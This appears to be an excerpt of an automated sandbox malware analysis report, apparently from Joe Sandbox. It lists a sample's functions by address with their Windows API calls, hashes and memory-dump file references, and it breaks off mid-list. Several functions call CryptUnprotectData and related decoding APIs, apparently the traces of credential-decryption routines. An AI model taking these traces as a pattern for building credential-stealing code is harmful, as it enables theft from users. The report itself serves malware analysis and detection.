                            • Source File: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 4Yw$5isc$cK%_$ekGt$(`=
                            • API String ID: 0-3750377496
                            • Opcode ID: 8b9483b1a6e8fdc3e102ad9873d93d640f020e44dd91a7547b57179a9e7c175b
                            • Instruction ID: 4fbddea0a9f1e91f5fd6fab0c61cc163096025e8ad66a52563e4829944c6d47e
                            • Opcode Fuzzy Hash: 8b9483b1a6e8fdc3e102ad9873d93d640f020e44dd91a7547b57179a9e7c175b
                            • Instruction Fuzzy Hash: D1B213F3A0C2149FE304AE2DEC8567AFBE9EF94320F16493DEAC5C3744E67558018696
                            Function 008E7750 Relevance: 7.6, APIs: 5, Instructions: 52memoryencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,00000400), ref: 008E775E
                            • RtlAllocateHeap.NTDLL(00000000), ref: 008E7765
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 008E778D
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 008E77AD
                            • LocalFree.KERNEL32(?), ref: 008E77B7
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                            • String ID:
                            • API String ID: 2609814428-0
                            • Opcode ID: 234c4f4c4d8e70a27fef90c7fb0f2666e39eb354aedcf460fda2d27a88151979
                            • Instruction ID: 6534fd3e49de60385e8b44b9a7136be6c907f1e6993f560e206893c5f94d96dc
                            • Opcode Fuzzy Hash: 234c4f4c4d8e70a27fef90c7fb0f2666e39eb354aedcf460fda2d27a88151979
                            • Instruction Fuzzy Hash: 1E011275B403087BEB10DB949C4AFEA7B78EB48B11F108155FB05EB2C0DAB099018791
                            Function 00C9E9AA Relevance: 6.7, Strings: 4, Instructions: 1677COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: /8{]$=Pe$^W$d<?
                            • API String ID: 0-688036109
                            • Opcode ID: 176b3ab2bfb5e15dfd9225ac863a17f0d2ff0e8461fc86b7c9a1faf67a8e56f1
                            • Instruction ID: 0383eeac09fe8dcd17cc2b46dd466083cb912bd91f47e107e548e419f3a461fc
                            • Opcode Fuzzy Hash: 176b3ab2bfb5e15dfd9225ac863a17f0d2ff0e8461fc86b7c9a1faf67a8e56f1
                            • Instruction Fuzzy Hash: C4B218F360C2049FE308AE2DEC8567ABBE6EFD4320F1A493DE6C5C3744EA3558058656
                            Function 00C9B488 Relevance: 6.7, Strings: 4, Instructions: 1669COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: $r</$5;ow$IQ>7$bOGk
                            • API String ID: 0-1528566901
                            • Opcode ID: f658ff58334509b2366e7e71ea3bc587effd230e72ea2e4e5c46925e3edb31df
                            • Instruction ID: fb606d0b60c7006dda803fb0fd72990c9bbb4af2f3af438e86a213dd38ce6d49
                            • Opcode Fuzzy Hash: f658ff58334509b2366e7e71ea3bc587effd230e72ea2e4e5c46925e3edb31df
                            • Instruction Fuzzy Hash: 5FB23BF3A0C204AFE3046E2DEC8567ABBD5EB94760F164A3DE6C4C7744EA3558018697
                            Function 00C948B5 Relevance: 6.6, Strings: 4, Instructions: 1643COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: :E?$cLW$d:o}$mq~k
                            • API String ID: 0-831522934
                            • Opcode ID: 6c93bb3a5a1f3ae395fcd56a91a77540124ecb520365657affd62949c45b9cd2
                            • Instruction ID: 62cb7e348bfb89f1118e6167064c0c5a7ccf07d3ee4020d22bdc6ea9a57416d8
                            • Opcode Fuzzy Hash: 6c93bb3a5a1f3ae395fcd56a91a77540124ecb520365657affd62949c45b9cd2
                            • Instruction Fuzzy Hash: A0B2D7F360C2009FD304AE2DEC8567ABBE6EF94720F16893DE6C5C7744EA3558058657
                            Function 00C9D051 Relevance: 6.6, Strings: 4, Instructions: 1586COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: !p$337{$V~oO$@MF
                            • API String ID: 0-1752303649
                            • Opcode ID: e10fbb72952fcbbb33270d18222917699140ad83a2c0484e10a6d9c90f493ae0
                            • Instruction ID: b7cadfff65acb705a4d55d5e25bb27b24383a856bdf4e0d3378c7feae0150543
                            • Opcode Fuzzy Hash: e10fbb72952fcbbb33270d18222917699140ad83a2c0484e10a6d9c90f493ae0
                            • Instruction Fuzzy Hash: F5B2B4F3A082109FE304AE2DEC8577AB7E9EF94720F16893DE6C5C3744EA3558058696
                            Function 008EEB80 Relevance: 6.1, APIs: 4, Instructions: 98stringencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 008EEBC6
                            • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 008EEBCE
                            • lstrcat.KERNEL32(0090CFF4,0090CFF4), ref: 008EEC77
                            • lstrcat.KERNEL32(0090CFF4,0090CFF4), ref: 008EEC99
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$BinaryCryptStringlstrlen
                            • String ID:
                            • API String ID: 189259977-0
                            • Opcode ID: 935bb8088324440399bee9ec808b16687beabb6c8ae9ed49a14c0d7eeb1d94b8
                            • Instruction ID: fe1154334b77ff6c0bdf70d972f6c8f2e4b76b50b56c5296686d8daac5a8201c
                            • Opcode Fuzzy Hash: 935bb8088324440399bee9ec808b16687beabb6c8ae9ed49a14c0d7eeb1d94b8
                            • Instruction Fuzzy Hash: 6331C976A14119ABD7109B58EC45BEF7B79EF84705F408165FA08E3280DBB05A058BA2
                            Function 009042C0 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 009042DD
                            • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 009042EC
                            • RtlAllocateHeap.NTDLL(00000000), ref: 009042F3
                            • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 00904323
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptHeapString$AllocateProcess
                            • String ID:
                            • API String ID: 3825993179-0
                            • Opcode ID: b129bbc59590e4d42b1f31a3ebc1ec8d4388273607cd057aa459b34f8d8d6a8c
                            • Instruction ID: 5e1ed58ab2e8ed47b9dfdfc738c09d32d1a39e6247a6b511dcf080df602e0861
                            • Opcode Fuzzy Hash: b129bbc59590e4d42b1f31a3ebc1ec8d4388273607cd057aa459b34f8d8d6a8c
                            • Instruction Fuzzy Hash: 12012CB1600209BFDB10DFA5EC99BAABBADEF89311F108159FE09C7250DA70D950CB60
                            Function 008E9B20 Relevance: 6.0, APIs: 4, Instructions: 42encryptionmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 008E9B3B
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 008E9B4A
                            • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 008E9B61
                            • LocalFree.KERNEL32 ref: 008E9B70
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptLocalString$AllocFree
                            • String ID:
                            • API String ID: 4291131564-0
                            • Opcode ID: 231fa092b15c90731990db574c29c511ac2e793a7e6a6bc79ca48988a0423a6f
                            • Instruction ID: a4f46e34e000186c86688e35bccca372971c904d9d5ef4f6e4e4bf12e386de38
                            • Opcode Fuzzy Hash: 231fa092b15c90731990db574c29c511ac2e793a7e6a6bc79ca48988a0423a6f
                            • Instruction Fuzzy Hash: A0F01DB03403627BF7305F65AC59F967BA8EF49B60F200114FE45EA2D0DBB09840CAA4
                            Function 00CA05D6 Relevance: 5.4, Strings: 3, Instructions: 1610COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 0Aie${WW}$$6
                            • API String ID: 0-3618849632
                            • Opcode ID: 8d71c265db3313a7c955e1d79bed51707f8a5f1af715d3786263bb1956b81fec
                            • Instruction ID: 8f852e7c9d19b8ea4b736492e720fd1b8a14a6a50edd4b995aa91d143caf6b6b
                            • Opcode Fuzzy Hash: 8d71c265db3313a7c955e1d79bed51707f8a5f1af715d3786263bb1956b81fec
                            • Instruction Fuzzy Hash: 94B2F7F3A0C2049FE304AF29EC8567AFBE9EF94720F16493DE6C5C3744EA3558018696
                            Function 00C92ECE Relevance: 5.3, Strings: 3, Instructions: 1564COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
